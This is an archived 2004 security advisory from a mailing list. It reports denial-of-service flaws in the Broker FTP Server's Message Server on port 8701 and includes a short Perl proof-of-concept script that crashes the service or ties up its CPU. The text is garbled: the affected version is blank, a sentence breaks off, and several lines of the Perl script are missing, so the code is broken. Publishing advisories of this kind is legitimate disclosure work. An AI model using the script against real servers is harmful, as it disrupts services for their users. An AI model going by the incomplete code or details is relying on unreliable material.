lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 17 Feb 2004 17:48:54 +0200
From: Aviram Jenik <>
Subject: Broker FTP DoS (Message Server)

  Broker FTP DoS (Message Server)

Article reference:


Beyond Security's SecurITeam has discovered two security vulnerabilities 
in the Broker FTP product, these vulnerabilities allow a remote attacker 
to repeatedly crash the TsFtpSrv.exe (The FTP Service) and to cause it to 
use large amount of CPU time.


Affected version:
 * Broker FTP Server version

By connecting and immediately disconnecting to the Broker FTP server's 
Message Server (by default residing on port 8701) it is possible to cause 
an exception in the TsFtpSrv.exe program. The exception doesn't cause any 
harm beside showing a message that the TsFtpSrv.exe has encountered an 
Application Error.

By connecting and not sending anything (but keeping the connection open), 
it is possible to cause the TsFtpSrv.exe to utilize large amount of CPU 
time (basically while the connection is kept open, CPU usage will be 

It is not clear what the Message Server is used for, but modifying the 
TsFtpSrv.ini's [TSMessageServer] allows an administrator to control what 
port the server listens on (and change it from the default one).

#!/usr/bin/perl -w
# TransSoft Broker FTP Server DoS (CPU usage and Exception)

use Socket;
if (not $ARGV[0]) {
        print qq~
                Usage: < host>

print "host: " . $ip . "\n\n";
sub sendexplt {
 my ($pstr)=@_;
        $target= inet_aton($ip) || die("inet_aton
||0) ||
 die("Socket problems\n");
 if(connect(S,pack "SnA4x8",2,8701,$target)){
 print $pstr;
 sleep 100;
 } else { die("Can't connect...\n"); }

Vendor Status:
We have tried to contact the vendor over a month ago, but have not received 
any response as of yet.


The information has been provided by  <> 

Beyond Security Ltd.
"Know that you're safe"


The information in this bulletin is provided "AS IS" without warranty of any 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 

Powered by blists - more mailing lists